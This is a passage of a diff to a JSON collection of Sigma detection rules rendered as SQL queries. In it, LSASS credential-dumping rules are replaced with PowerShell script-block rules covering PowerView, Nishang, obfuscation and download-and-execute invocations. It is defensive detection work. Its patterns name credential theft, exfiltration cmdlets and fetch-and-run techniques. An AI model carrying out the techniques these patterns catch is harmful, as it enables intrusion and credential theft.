ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE 